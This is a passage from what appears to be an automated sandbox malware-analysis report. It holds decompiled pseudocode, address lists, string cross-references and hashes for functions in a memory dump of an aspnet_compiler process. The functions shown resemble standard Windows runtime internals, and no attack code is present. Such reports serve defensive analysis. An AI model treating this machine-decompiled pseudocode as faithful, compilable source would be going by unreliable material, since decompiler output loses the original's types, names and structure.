																__eflags =  *((intOrPtr*)(_t86 + 0xfbc)) - _t177;
																if( *((intOrPtr*)(_t86 + 0xfbc)) != _t177) {
																	_t177 =  *( *( *[fs:0x18] + 0xfbc));
																}
																__eflags = _t177;
																if(_t177 == 0) {
																	L31:
																	__eflags = 0;
																	L012570F0(_t170 | 0x00000030,  &_v32, 0,  &_v28);
																	goto L32;
																} else {
																	__eflags = _v24;
																	_t91 =  *(_t177 + 0x20);
																	if(_v24 != 0) {
																		 *(_t177 + 0x20) = _t91 & 0xfffffff9;
																		goto L31;
																	} else {
																		_t141 = _t91 & 0x00000040;
																		__eflags = _t170 & 0x00000100;
																		if((_t170 & 0x00000100) == 0) {
																			__eflags = _t141;
																			if(_t141 == 0) {
																				L74:
																				_t94 = _t91 & 0xfffffffd | 0x00000004;
																				goto L27;
																			} else {
																				_t177 = E0127FD22(_t177);
																				__eflags = _t177;
																				if(_t177 == 0) {
																					goto L42;
																				} else {
																					_t130 = E0127FD9B(_t177, 0, 4);
																					__eflags = _t130;
																					if(_t130 != 0) {
																						goto L42;
																					} else {
																						_t68 = _t177 + 0x20;
																						 *_t68 =  *(_t177 + 0x20) & 0xffffffbf;
																						__eflags =  *_t68;
																						_t91 =  *(_t177 + 0x20);
																						goto L74;
																					}
																				}
																			}
																			goto L35;
																		} else {
																			__eflags = _t141;
																			if(_t141 != 0) {
																				_t177 = E0127FD22(_t177);
																				__eflags = _t177;
																				if(_t177 == 0) {
																					L42:
																					_t77 = 0xc0000001;
																					goto L33;
																				} else {
																					_t130 = E0127FD9B(_t177, 0, 4);
																					__eflags = _t130;
																					if(_t130 != 0) {
																						goto L42;
																					} else {
																						 *(_t177 + 0x20) =  *(_t177 + 0x20) & 0xffffffbf;
																						_t91 =  *(_t177 + 0x20);
																						goto L26;
																					}
																				}
																				goto L35;
																			} else {
																				L26:
																				_t94 = _t91 & 0xfffffffb | 0x00000002;
																				__eflags = _t94;
																				L27:
																				 *(_t177 + 0x20) = _t94;
																				__eflags = _t170 & 0x00008000;
																				if((_t170 & 0x00008000) != 0) {
																					_t95 = _a12;
																					__eflags = _t95;
																					if(_t95 != 0) {
																						_t96 =  *_t95;
																						__eflags = _t96;
																						if(_t96 != 0) {
																							 *((short*)(_t177 + 0x22)) = 0;
																							_t40 = _t177 + 0x20;
																							 *_t40 =  *(_t177 + 0x20) | _t96 << 0x00000010;
																							__eflags =  *_t40;
																						}
																					}
																				}
																				goto L31;
																			}
																		}
																	}
																}
															}
														}
													} else {
														_t147 =  *( *[fs:0x18] + 0xfc0);
														_t106 =  *(_t147 + 0x20);
														__eflags = _t106 & 0x00000040;
														if((_t106 & 0x00000040) != 0) {
															_t147 = E0127FD22(_t147);
															__eflags = _t147;
															if(_t147 == 0) {
																L41:
																_t130 = 0xc0000001;
																L32:
																_t77 = _t130;
																goto L33;
															} else {
																 *(_t147 + 0x20) =  *(_t147 + 0x20) & 0xffffffbf;
																_t106 =  *(_t147 + 0x20);
																goto L17;
															}
															goto L35;
														} else {
															L17:
															_t108 = _t106 | 0x00000080;
															__eflags = _t108;
															 *(_t147 + 0x20) = _t108;
															 *( *[fs:0x18] + 0xfc0) = _t147;
															goto L18;
														}
													}
												}
											}
											L33:
										}
									}
								}
							}
						}
						L35:
						return _t77;
					} else {
						 *_t75 = 0x1337b80;
						 *((intOrPtr*)(_t75 + 4)) = _t134;
						 *_t134 = _t75;
						 *0x1337b84 = _t75;
						_t73 = E0125EB70(_t134, 0x1337b60);
						if( *0x1337b20 != 0) {
							_t73 =  *( *[fs:0x30] + 0xc);
							if( *((char*)(_t73 + 0x28)) == 0) {
								_t73 = E0125FF60( *0x1337b20);
							}
						}
						goto L5;
					}
				}
			}

0x0127fab0
0x0127fab2
0x0127fab3
0x0127fab4
0x0127fabc
0x0127fac0
0x0127fb14
0x0127fb17
0x0127fac2
0x0127fac8
0x0127facd
0x0127fad3
0x0127fad3
0x0127fadd
0x0127fb18
0x0127fb1b
0x0127fb1d
0x0127fb1e
0x0127fb1f
0x0127fb20
0x0127fb21
0x0127fb22
0x0127fb23
0x0127fb24
0x0127fb25
0x0127fb26
0x0127fb27
0x0127fb28
0x0127fb29
0x0127fb2a
0x0127fb2b
0x0127fb2c
0x0127fb2d
0x0127fb2e
0x0127fb2f
0x0127fb3a
0x0127fb3b
0x0127fb3e
0x0127fb41
0x0127fb44
0x0127fb47
0x0127fb4a
0x0127fb4d
0x0127fb53
0x012bbdcb
0x012bbdcb
0x0127fb59
0x0127fb5b
0x0127fb5b
0x0127fb5e
0x012bbdd5
0x012bbdd8
0x00000000
0x012bbdda
0x00000000
0x012bbdda
0x0127fb64
0x0127fb64
0x0127fb64
0x0127fb67
0x0127fb6e
0x0127fb70
0x0127fb72
0x00000000
0x0127fb78
0x0127fb7a
0x0127fb7a
0x0127fb7d
0x0127fb80
0x012bbddf
0x012bbde1
0x00000000
0x012bbde3
0x00000000
0x012bbde3
0x0127fb86
0x0127fb86
0x0127fb86
0x0127fb8b
0x0127fb90
0x0127fb92
0x0127fb94
0x0127fb9a
0x0127fb9b
0x0127fba1
0x012bbde8
0x012bbdeb
0x012bbded
0x012bbeb5
0x012bbeb5
0x012bbebb
0x012bbebd
0x012bbec3
0x012bbed2
0x012bbedd
0x012bbedd
0x012bbeed
0x00000000
0x012bbdf3
0x012bbdfe
0x012bbe06
0x012bbe0b
0x012bbe0d
0x012bbe0f
0x012bbe14
0x012bbe19
0x012bbe20
0x012bbe25
0x012bbe27
0x012bbe35
0x012bbe39
0x012bbe46
0x012bbe4f
0x012bbe54
0x012bbe56
0x012bbef8
0x012bbef8
0x00000000
0x012bbe5c
0x012bbe5c
0x012bbe60
0x00000000
0x012bbe66
0x012bbe66
0x012bbe7f
0x012bbe84
0x012bbe87
0x012bbe89
0x012bbe8b
0x012bbe99
0x012bbe9d
0x012bbea0
0x012bbeac
0x012bbeaf
0x012bbeb1
0x012bbeb3
0x012bbeb3
0x00000000
0x012bbea2
0x012bbea2
0x00000000
0x012bbea2
0x012bbe8d
0x012bbe8d
0x012bbe92
0x00000000
0x012bbe92
0x012bbe8b
0x012bbe60
0x012bbe3b
0x012bbe3b
0x012bbe3e
0x00000000
0x012bbe40
0x012bbe40
0x012bbe44
0x00000000
0x00000000
0x00000000
0x00000000
0x012bbe44
0x012bbe3e
0x012bbe29
0x012bbe29
0x00000000
0x012bbe29
0x012bbe27
0x00000000
0x0127fba7
0x0127fba7
0x0127fbab
0x012bbf02
0x0127fbb1
0x0127fbb1
0x0127fbb8
0x0127fbbd
0x0127fbbd
0x0127fbbf
0x0127fbbf
0x0127fbc5
0x0127fbcb
0x0127fbf8
0x0127fbf8
0x0127fbfa
0x00000000
0x0127fc00
0x0127fc00
0x0127fc03
0x00000000
0x0127fc09
0x0127fc09
0x0127fc0f
0x0127fc15
0x0127fc23
0x0127fc23
0x0127fc25
0x0127fc27
0x0127fc75
0x0127fc7c
0x0127fc84
0x00000000
0x0127fc29
0x0127fc29
0x0127fc2d
0x0127fc30
0x012bbf0f
0x00000000
0x0127fc36
0x0127fc38
0x0127fc3b
0x0127fc41
0x012bbf17
0x012bbf19
0x012bbf48
0x012bbf4b
0x00000000
0x012bbf1b
0x012bbf22
0x012bbf24
0x012bbf26
0x00000000
0x012bbf2c
0x012bbf37
0x012bbf39
0x012bbf3b
0x00000000
0x012bbf41
0x012bbf41
0x012bbf41
0x012bbf41
0x012bbf45
0x00000000
0x012bbf45
0x012bbf3b
0x012bbf26
0x00000000
0x0127fc47
0x0127fc47
0x0127fc49
0x0127fcb2
0x0127fcb4
0x0127fcb6
0x0127fcdc
0x0127fcdc
0x00000000
0x0127fcb8
0x0127fcc3
0x0127fcc5
0x0127fcc7
0x00000000
0x0127fcc9
0x0127fcc9
0x0127fccd
0x00000000
0x0127fccd
0x0127fcc7
0x00000000
0x0127fc4b
0x0127fc4b
0x0127fc4e
0x0127fc4e
0x0127fc51
0x0127fc51
0x0127fc54
0x0127fc5a
0x0127fc5c
0x0127fc5f
0x0127fc61
0x0127fc63
0x0127fc65
0x0127fc67
0x0127fc6e
0x0127fc72
0x0127fc72
0x0127fc72
0x0127fc72
0x0127fc67
0x0127fc61
0x00000000
0x0127fc5a
0x0127fc49
0x0127fc41
0x0127fc30
0x0127fc27
0x0127fc03
0x0127fbcd
0x0127fbd3
0x0127fbd9
0x0127fbdc
0x0127fbde
0x0127fc99
0x0127fc9b
0x0127fc9d
0x0127fcd5
0x0127fcd5
0x0127fc89
0x0127fc89
0x00000000
0x0127fc9f
0x0127fc9f
0x0127fca3
0x00000000
0x0127fca3
0x00000000
0x0127fbe4
0x0127fbe4
0x0127fbe4
0x0127fbe4
0x0127fbe9
0x0127fbf2
0x00000000
0x0127fbf2
0x0127fbde
0x0127fbcb
0x0127fbab
0x0127fc8b
0x0127fc8b
0x0127fc8c
0x0127fb80
0x0127fb72
0x0127fb5e
0x0127fc8d
0x0127fc91
0x0127fadf
0x0127fadf
0x0127fae1
0x0127fae4
0x0127fae7
0x0127faec
0x0127faf8
0x0127fb00
0x0127fb07
0x0127fb0f
0x0127fb0f
0x0127fb07
0x00000000
0x0127faf8
0x0127fadd

Strings

*** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!, xrefs: 012BBE0F

Memory Dump Source

Source File: 00000001.00000002.458723948.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1220000_aspnet_compiler.jbxd

Similarity

API ID:
String ID: *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!
API String ID: 0-865735534
Opcode ID: 4fd0d9f2f4f93b0a88db12773fd5ee0c4dacd799e282de5818086ccb02caf685
Instruction ID: 17340f02ca880736bf4a3aa13b0f1a0125884e1b6732d063944d1540d6d7fe27
Opcode Fuzzy Hash: 4fd0d9f2f4f93b0a88db12773fd5ee0c4dacd799e282de5818086ccb02caf685
Instruction Fuzzy Hash: C1A10471B246078BEB25CF68C590BBBB7A4AF48710F04456DEB26DB690EB74D841CB90

Uniqueness

Uniqueness Score: -1.00%

Function 01242D8A Relevance: 1.4, Strings: 1, Instructions: 191
COMMON

Download Yara Rule

C-Code - Quality: 63%

			E01242D8A(void* __ebx, signed char __ecx, signed int __edx, signed int __edi) {
				signed char _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				signed int _v52;
				void* __esi;
				void* __ebp;
				intOrPtr _t55;
				signed int _t57;
				signed int _t58;
				char* _t62;
				signed char* _t63;
				signed char* _t64;
				signed int _t67;
				signed int _t72;
				signed int _t77;
				signed int _t78;
				signed int _t88;
				intOrPtr _t89;
				signed char _t93;
				signed int _t97;
				signed int _t98;
				signed int _t102;
				signed int _t103;
				intOrPtr _t104;
				signed int _t105;
				signed int _t106;
				signed char _t109;
				signed int _t111;
				void* _t116;

				_t102 = __edi;
				_t97 = __edx;
				_v12 = _v12 & 0x00000000;
				_t55 =  *[fs:0x18];
				_t109 = __ecx;
				_v8 = __edx;
				_t86 = 0;
				_v32 = _t55;
				_v24 = 0;
				_push(__edi);
				if(__ecx == 0x1335350) {
					_t86 = 1;
					_v24 = 1;
					 *((intOrPtr*)(_t55 + 0xf84)) = 1;
				}
				_t103 = _t102 | 0xffffffff;
				if( *0x1337bc8 != 0) {
					_push(0xc000004b);
					_push(_t103);
					E012897C0();
				}
				if( *0x13379c4 != 0) {
					_t57 = 0;
				} else {
					_t57 = 0x13379c8;
				}
				_v16 = _t57;
				if( *((intOrPtr*)(_t109 + 0x10)) == 0) {
					_t93 = _t109;
					L23();
				}
				_t58 =  *_t109;
				if(_t58 == _t103) {
					__eflags =  *(_t109 + 0x14) & 0x01000000;
					_t58 = _t103;
					if(__eflags == 0) {
						_t93 = _t109;
						E01271624(_t86, __eflags);
						_t58 =  *_t109;
					}
				}
				_v20 = _v20 & 0x00000000;
				if(_t58 != _t103) {
					 *((intOrPtr*)(_t58 + 0x14)) =  *((intOrPtr*)(_t58 + 0x14)) + 1;
				}
				_t104 =  *((intOrPtr*)(_t109 + 0x10));
				_t88 = _v16;
				_v28 = _t104;
				L9:
				while(1) {
					if(E01267D50() != 0) {
						_t62 = ( *[fs:0x30])[0x50] + 0x228;
					} else {
						_t62 = 0x7ffe0382;
					}
					if( *_t62 != 0) {
						_t63 =  *[fs:0x30];
						__eflags = _t63[0x240] & 0x00000002;
						if((_t63[0x240] & 0x00000002) != 0) {
							_t93 = _t109;
							E012DFE87(_t93);
						}
					}
					if(_t104 != 0xffffffff) {
						_push(_t88);
						_push(0);
						_push(_t104);
						_t64 = E01289520();
						goto L15;
					} else {
						while(1) {
							_t97 =  &_v8;
							_t64 = E0127E18B(_t109 + 4, _t97, 4, _t88, 0);
							if(_t64 == 0x102) {
								break;
							}
							_t93 =  *(_t109 + 4);
							_v8 = _t93;
							if((_t93 & 0x00000002) != 0) {
								continue;
							}
							L15:
							if(_t64 == 0x102) {
								break;
							}
							_t89 = _v24;
							if(_t64 < 0) {
								L0129DF30(_t93, _t97, _t64);
								_push(_t93);
								_t98 = _t97 | 0xffffffff;
								__eflags =  *0x1336901;
								_push(_t109);
								_v52 = _t98;
								if( *0x1336901 != 0) {
									_push(0);
									_push(1);
									_push(0);
									_push(0x100003);
									_push( &_v12);
									_t72 = E01289980();
									__eflags = _t72;
									if(_t72 < 0) {
										_v12 = _t98 | 0xffffffff;
									}
								}
								asm("lock cmpxchg [ecx], edx");
								_t111 = 0;
								__eflags = 0;
								if(0 != 0) {
									__eflags = _v12 - 0xffffffff;
									if(_v12 != 0xffffffff) {
										_push(_v12);
										E012895D0();
									}
								} else {
									_t111 = _v12;
								}
								return _t111;
							} else {
								if(_t89 != 0) {
									 *((intOrPtr*)(_v32 + 0xf84)) = 0;
									_t77 = E01267D50();
									__eflags = _t77;
									if(_t77 == 0) {
										_t64 = 0x7ffe0384;
									} else {
										_t64 = ( *[fs:0x30])[0x50] + 0x22a;
									}
									__eflags =  *_t64;
									if( *_t64 != 0) {
										_t64 =  *[fs:0x30];
										__eflags = _t64[0x240] & 0x00000004;
										if((_t64[0x240] & 0x00000004) != 0) {
											_t78 = E01267D50();
											__eflags = _t78;
											if(_t78 == 0) {
												_t64 = 0x7ffe0385;
											} else {
												_t64 = ( *[fs:0x30])[0x50] + 0x22b;
											}
											__eflags =  *_t64 & 0x00000020;
											if(( *_t64 & 0x00000020) != 0) {
												_t64 = E012C7016(0x1483, _t97 | 0xffffffff, 0xffffffff, 0xffffffff, 0, 0);
											}
										}
									}
								}
								return _t64;
							}
						}
						_t97 = _t88;
						_t93 = _t109;
						E012DFDDA(_t97, _v12);
						_t105 =  *_t109;
						_t67 = _v12 + 1;
						_v12 = _t67;
						__eflags = _t105 - 0xffffffff;
						if(_t105 == 0xffffffff) {
							_t106 = 0;
							__eflags = 0;
						} else {
							_t106 =  *(_t105 + 0x14);
						}
						__eflags = _t67 - 2;
						if(_t67 > 2) {
							__eflags = _t109 - 0x1335350;
							if(_t109 != 0x1335350) {
								__eflags = _t106 - _v20;
								if(__eflags == 0) {
									_t93 = _t109;
									E012DFFB9(_t88, _t93, _t97, _t106, _t109, __eflags);
								}
							}
						}
						_push("RTL: Re-Waiting\n");
						_push(0);
						_push(0x65);
						_v20 = _t106;
						E012D5720();
						_t104 = _v28;
						_t116 = _t116 + 0xc;
						continue;
					}
				}
			}

0x01242d8a
0x01242d8a
0x01242d92
0x01242d96
0x01242d9e
0x01242da0
0x01242da3
0x01242da5
0x01242da8
0x01242dab
0x01242db2
0x0129f9aa
0x0129f9ab
0x0129f9ae
0x0129f9ae
0x01242db8
0x01242dc2
0x0129f9b9
0x0129f9be
0x0129f9bf
0x0129f9bf
0x01242dcf
0x0129f9c9
0x01242dd5
0x01242dd5
0x01242dd5
0x01242dde
0x01242de1
0x01242e70
0x01242e72
0x01242e72
0x01242de7
0x01242deb
0x01242e7c
0x01242e83
0x01242e85
0x01242e8b
0x01242e8d
0x01242e92
0x01242e92
0x01242e85
0x01242df1
0x01242df7
0x01242df9
0x01242df9
0x01242dfc
0x01242dff
0x01242e02
0x00000000
0x01242e05
0x01242e0c
0x0129f9d9
0x01242e12
0x01242e12
0x01242e12
0x01242e1a
0x0129f9e3
0x0129f9e9
0x0129f9f0
0x0129f9f6
0x0129f9f8
0x0129f9f8
0x0129f9f0
0x01242e23
0x0129fa02
0x0129fa03
0x0129fa05
0x0129fa06
0x00000000
0x01242e29
0x01242e29
0x01242e2e
0x01242e34
0x01242e3e
0x00000000
0x00000000
0x01242e44
0x01242e47
0x01242e4d
0x00000000
0x00000000
0x01242e4f
0x01242e54
0x00000000
0x00000000
0x01242e5a
0x01242e5f
0x01242e9a
0x01242ea4
0x01242ea5
0x01242ea8
0x01242eaf
0x01242eb2
0x01242eb5
0x0129fae9
0x0129faeb
0x0129faed
0x0129faef
0x0129faf7
0x0129faf8
0x0129fafd
0x0129faff
0x0129fb04
0x0129fb04
0x0129faff
0x01242ec0
0x01242ec4
0x01242ec6
0x01242ec8
0x0129fb14
0x0129fb18
0x0129fb1e
0x0129fb21
0x0129fb21
0x01242ece
0x01242ece
0x01242ece
0x01242ed7
0x01242e61
0x01242e63
0x0129fa6b
0x0129fa71
0x0129fa76
0x0129fa78
0x0129fa8a
0x0129fa7a
0x0129fa83
0x0129fa83
0x0129fa8f
0x0129fa91
0x0129fa97
0x0129fa9d
0x0129faa4
0x0129faaa
0x0129faaf
0x0129fab1
0x0129fac3
0x0129fab3
0x0129fabc
0x0129fabc
0x0129fac8
0x0129facb
0x0129fadf
0x0129fadf
0x0129facb
0x0129faa4
0x0129fa91
0x01242e6f
0x01242e6f
0x01242e5f
0x0129fa13
0x0129fa15
0x0129fa17
0x0129fa1f
0x0129fa21
0x0129fa22
0x0129fa25
0x0129fa28
0x0129fa2f
0x0129fa2f
0x0129fa2a
0x0129fa2a
0x0129fa2a
0x0129fa31
0x0129fa34
0x0129fa36
0x0129fa3c
0x0129fa3e
0x0129fa41
0x0129fa43
0x0129fa45
0x0129fa45
0x0129fa41
0x0129fa3c
0x0129fa4a
0x0129fa4f
0x0129fa51
0x0129fa53
0x0129fa56
0x0129fa5b
0x0129fa5e
0x00000000
0x0129fa5e
0x01242e23

Strings

RTL: Re-Waiting, xrefs: 0129FA4A

Memory Dump Source

Source File: 00000001.00000002.458723948.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1220000_aspnet_compiler.jbxd

Similarity

API ID:
String ID: RTL: Re-Waiting
API String ID: 0-316354757
Opcode ID: 576ab544678e779c8116462a957e813375f2a163ff0a194a2997156aa2c1a83d
Instruction ID: 51b37dbcaf0aa04cbae41ef708e0270eab57c340437bc322c075a2394621e2f4
Opcode Fuzzy Hash: 576ab544678e779c8116462a957e813375f2a163ff0a194a2997156aa2c1a83d
Instruction Fuzzy Hash: 4E615331B20606EFEF36DF6DD980B7E7BA4EB44724F1406A9EA11D72C1C778A9008791

Uniqueness

Uniqueness Score: -1.00%

Function 01310EA5 Relevance: 1.4, Strings: 1, Instructions: 153
COMMON

Download Yara Rule

C-Code - Quality: 80%

			E01310EA5(void* __ecx, void* __edx) {
				signed int _v20;
				char _v24;
				intOrPtr _v28;
				unsigned int _v32;
				signed int _v36;
				intOrPtr _v40;
				char _v44;
				intOrPtr _v64;
				void* __ebx;
				void* __edi;
				signed int _t58;
				unsigned int _t60;
				intOrPtr _t62;
				char* _t67;
				char* _t69;
				void* _t80;
				void* _t83;
				intOrPtr _t93;
				intOrPtr _t115;
				char _t117;
				void* _t120;

				_t83 = __edx;
				_t117 = 0;
				_t120 = __ecx;
				_v44 = 0;
				if(E0130FF69(__ecx,  &_v44,  &_v32) < 0) {
					L24:
					_t109 = _v44;
					if(_v44 != 0) {
						E01311074(_t83, _t120, _t109, _t117, _t117);
					}
					L26:
					return _t117;
				}
				_t93 =  *((intOrPtr*)(__ecx + 0x3c));
				_t5 = _t83 + 1; // 0x1
				_v36 = _t5 << 0xc;
				_v40 = _t93;
				_t58 =  *(_t93 + 0xc) & 0x40000000;
				asm("sbb ebx, ebx");
				_t83 = ( ~_t58 & 0x0000003c) + 4;
				if(_t58 != 0) {
					_push(0);
					_push(0x14);
					_push( &_v24);
					_push(3);
					_push(_t93);
					_push(0xffffffff);
					_t80 = E01289730();
					_t115 = _v64;
					if(_t80 < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t115) {
						_push(_t93);
						E0130A80D(_t115, 1, _v20, _t117);
						_t83 = 4;
					}
				}
				if(E0130A854( &_v44,  &_v36, _t117, 0x40001000, _t83, _t117,  *((intOrPtr*)(_t120 + 0x34)),  *((intOrPtr*)(_t120 + 0x38))) < 0) {
					goto L24;
				}
				_t60 = _v32;
				_t97 = (_t60 != 0x100000) + 1;
				_t83 = (_v44 -  *0x1338b04 >> 0x14) + (_v44 -  *0x1338b04 >> 0x14);
				_v28 = (_t60 != 0x100000) + 1;
				_t62 = _t83 + (_t60 >> 0x14) * 2;
				_v40 = _t62;
				if(_t83 >= _t62) {
					L10:
					asm("lock xadd [eax], ecx");
					asm("lock xadd [eax], ecx");
					if(E01267D50() == 0) {
						_t67 = 0x7ffe0380;
					} else {
						_t67 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
					}
					if( *_t67 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
						E0130138A(_t83,  *((intOrPtr*)(_t120 + 0x3c)), _v44, _v36, 0xc);
					}
					if(E01267D50() == 0) {
						_t69 = 0x7ffe0388;
					} else {
						_t69 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
					}
					if( *_t69 != 0) {
						E012FFEC0(_t83,  *((intOrPtr*)(_t120 + 0x3c)), _v44, _v32);
					}
					if(( *0x1338724 & 0x00000008) != 0) {
						E013052F8( *((intOrPtr*)(_t120 + 0x3c)),  *((intOrPtr*)(_t120 + 0x28)));
					}
					_t117 = _v44;
					goto L26;
				}
				while(E013115B5(0x1338ae4, _t83, _t97, _t97) >= 0) {
					_t97 = _v28;
					_t83 = _t83 + 2;
					if(_t83 < _v40) {
						continue;
					}
					goto L10;
				}
				goto L24;
			}

0x01310eb7
0x01310eb9
0x01310ec0
0x01310ec2
0x01310ecd
0x0131105b
0x0131105b
0x01311061
0x01311066
0x01311066
0x0131106b
0x01311073
0x01311073
0x01310ed3
0x01310ed6
0x01310edc
0x01310ee0
0x01310ee7
0x01310ef0
0x01310ef5
0x01310efa
0x01310efc
0x01310efd
0x01310f03
0x01310f04
0x01310f06
0x01310f07
0x01310f09
0x01310f0e
0x01310f14
0x01310f23
0x01310f2d
0x01310f34
0x01310f34
0x01310f14
0x01310f52
0x00000000
0x00000000
0x01310f58
0x01310f73
0x01310f74
0x01310f79
0x01310f7d
0x01310f80
0x01310f86
0x01310fab
0x01310fb5
0x01310fc6
0x01310fd1
0x01310fe3
0x01310fd3
0x01310fdc
0x01310fdc
0x01310feb
0x01311009
0x01311009
0x01311015
0x01311027
0x01311017
0x01311020
0x01311020
0x0131102f
0x0131103c
0x0131103c
0x01311048
0x01311050
0x01311050
0x01311055
0x00000000
0x01311055
0x01310f88
0x01310f9e
0x01310fa2
0x01310fa9
0x00000000
0x00000000
0x00000000
0x01310fa9
0x00000000

Strings

`, xrefs: 01310F16

Memory Dump Source

Source File: 00000001.00000002.458723948.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1220000_aspnet_compiler.jbxd

Similarity

API ID:
String ID: `
API String ID: 0-2679148245
Opcode ID: 3f21533747b718fa2659900502fd9075517d7dfa5486d5e7bf9adb8e0938045c
Instruction ID: 98d613a37e3fa19e1b8a40ba65f3f42278eef2a6df46d3e4ac4efc6e2d3d712a
Opcode Fuzzy Hash: 3f21533747b718fa2659900502fd9075517d7dfa5486d5e7bf9adb8e0938045c
Instruction Fuzzy Hash: A051C3717043429FE329DF28D884B6BBBE9EBC4708F04092CF68697294D770E949CB61

Uniqueness

Uniqueness Score: -1.00%

Function 0127F0BF Relevance: 1.4, Strings: 1, Instructions: 137
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E0127F0BF(signed short* __ecx, signed short __edx, void* __eflags, intOrPtr* _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char* _v20;
				intOrPtr _v24;
				char _v28;
				intOrPtr _v32;
				char _v36;
				char _v44;
				char _v52;
				intOrPtr _v56;
				char _v60;
				intOrPtr _v72;
				void* _t51;
				void* _t58;
				signed short _t82;
				short _t84;
				signed int _t91;
				signed int _t100;
				signed short* _t103;
				void* _t108;
				intOrPtr* _t109;

				_t103 = __ecx;
				_t82 = __edx;
				_t51 = E01264120(0, __ecx, 0,  &_v52, 0, 0, 0);
				if(_t51 >= 0) {
					_push(0x21);
					_push(3);
					_v56 =  *0x7ffe02dc;
					_v20 =  &_v52;
					_push( &_v44);
					_v28 = 0x18;
					_push( &_v28);
					_push(0x100020);
					_v24 = 0;
					_push( &_v60);
					_v16 = 0x40;
					_v12 = 0;
					_v8 = 0;
					_t58 = E01289830();
					_t87 =  *[fs:0x30];
					_t108 = _t58;
					L012677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v72);
					if(_t108 < 0) {
						L11:
						_t51 = _t108;
					} else {
						_push(4);
						_push(8);
						_push( &_v36);
						_push( &_v44);
						_push(_v60);
						_t108 = E01289990();
						if(_t108 < 0) {
							L10:
							_push(_v60);
							E012895D0();
							goto L11;
						} else {
							_t109 = L01264620(_t87,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t82 + 0x18);
							if(_t109 == 0) {
								_t108 = 0xc0000017;
								goto L10;
							} else {
								_t21 = _t109 + 0x18; // 0x18
								 *((intOrPtr*)(_t109 + 4)) = _v60;
								 *_t109 = 1;
								 *((intOrPtr*)(_t109 + 0x10)) = _t21;
								 *(_t109 + 0xe) = _t82;
								 *((intOrPtr*)(_t109 + 8)) = _v56;
								 *((intOrPtr*)(_t109 + 0x14)) = _v32;
								E0128F3E0(_t21, _t103[2],  *_t103 & 0x0000ffff);
								 *((short*)( *((intOrPtr*)(_t109 + 0x10)) + (( *_t103 & 0x0000ffff) >> 1) * 2)) = 0;
								 *((short*)(_t109 + 0xc)) =  *_t103;
								_t91 =  *_t103 & 0x0000ffff;
								_t100 = _t91 & 0xfffffffe;
								_t84 = 0x5c;
								if( *((intOrPtr*)(_t103[2] + _t100 - 2)) != _t84) {
									if(_t91 + 4 > ( *(_t109 + 0xe) & 0x0000ffff)) {
										_push(_v60);
										E012895D0();
										L012677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t109);
										_t51 = 0xc0000106;
									} else {
										 *((short*)(_t100 +  *((intOrPtr*)(_t109 + 0x10)))) = _t84;
										 *((short*)( *((intOrPtr*)(_t109 + 0x10)) + 2 + (( *_t103 & 0x0000ffff) >> 1) * 2)) = 0;
										 *((short*)(_t109 + 0xc)) =  *((short*)(_t109 + 0xc)) + 2;
										goto L5;
									}
								} else {
									L5:
									 *_a4 = _t109;
									_t51 = 0;
								}
							}
						}
					}
				}
				return _t51;
			}

0x0127f0d3
0x0127f0d9
0x0127f0e0
0x0127f0e7
0x0127f0f2
0x0127f0f4
0x0127f0f8
0x0127f100
0x0127f108
0x0127f10d
0x0127f115
0x0127f116
0x0127f11f
0x0127f123
0x0127f124
0x0127f12c
0x0127f130
0x0127f134
0x0127f13d
0x0127f144
0x0127f14b
0x0127f152
0x012bbab0
0x012bbab0
0x0127f158
0x0127f158
0x0127f15a
0x0127f160
0x0127f165
0x0127f166
0x0127f16f
0x0127f173
0x012bbaa7
0x012bbaa7
0x012bbaab
0x00000000
0x0127f179
0x0127f18d
0x0127f191
0x012bbaa2
0x00000000
0x0127f197
0x0127f19b
0x0127f1a2
0x0127f1a9
0x0127f1af
0x0127f1b2
0x0127f1b6
0x0127f1b9
0x0127f1c4
0x0127f1d8
0x0127f1df
0x0127f1e3
0x0127f1eb
0x0127f1ee
0x0127f1f4
0x0127f20f
0x012bbab7
0x012bbabb
0x012bbacc
0x012bbad1
0x0127f215
0x0127f218
0x0127f226
0x0127f22b
0x00000000
0x0127f22b
0x0127f1f6
0x0127f1f6
0x0127f1f9
0x0127f1fb
0x0127f1fb
0x0127f1f4
0x0127f191
0x0127f173
0x0127f152
0x0127f203

Strings

@, xrefs: 0127F124

Memory Dump Source

Source File: 00000001.00000002.458723948.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1220000_aspnet_compiler.jbxd

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
Instruction ID: b0204b3678a5f7824435f514b3d5ad1491c4b72277cb02c0d1782363b382f49f
Opcode Fuzzy Hash: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
Instruction Fuzzy Hash: BD51B0715157119FC321DF18C840A6BBBF8FF88710F00892DFAA587690E7B4E944CB91

Uniqueness

Uniqueness Score: -1.00%

Function 012C3540 Relevance: 1.4, Strings: 1, Instructions: 130
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E012C3540(intOrPtr _a4) {
				signed int _v12;
				intOrPtr _v88;
				intOrPtr _v92;
				char _v96;
				char _v352;
				char _v1072;
				intOrPtr _v1140;
